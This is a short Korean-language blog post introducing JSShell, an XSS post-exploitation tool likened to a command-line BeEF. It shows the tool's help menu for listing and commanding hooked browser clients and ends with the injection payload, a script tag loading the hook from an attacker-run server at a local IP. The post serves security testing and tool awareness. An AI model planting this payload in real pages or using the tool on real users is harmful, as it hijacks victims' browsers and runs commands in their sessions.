JSSHELL이라 툴로 XSS Post Exploit 툴 정도로 보심 되고 요약하면 beef의 Command line 버전이라고 생각하시면 좋을 것 같습니다.
https://github.com/Den1al/JSShell
╦╔═╗┌─┐┬ ┬┌─┐┬ ┬ ║╚═╗└─┐├─┤├┤ │ │ ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0 by @Daniel_Abeles >> help Documented commands (type help <topic>): General Commands -------------------------------------------------------------------------------- edit Edit a file in a text editor help List available commands or provide detailed help for a specific command history View, run, edit, save, or clear previously entered commands ipy Enter an interactive IPython shell py Invoke Python command or shell quit Exit this application Shell Based Operations -------------------------------------------------------------------------------- back Un-select the current selected client clients List and control the clients that have registered to our system commands Show the executed commands on the selected client dump Dumps a command to the disk execute Execute commands on the selected client select Select a client as the current client >>
분석 과정에서 쓸일은 거의 없지만 추가적인 영향력 테스트나 장난감으로 가지고 놀기 좋아보여요. 다른 XSS Post Exploit 툴과 비슷하게 서버 실행하고 아래 path(/content/js)를 삽입해서 나머지 처리 로직을 불러올 수 있습니다.
<script src="http://192.168.0.14/content/js"></script>
 |
HAHWULSecurity engineer, Gopher and H4cker!
 |
0 개의 댓글:
Post a Comment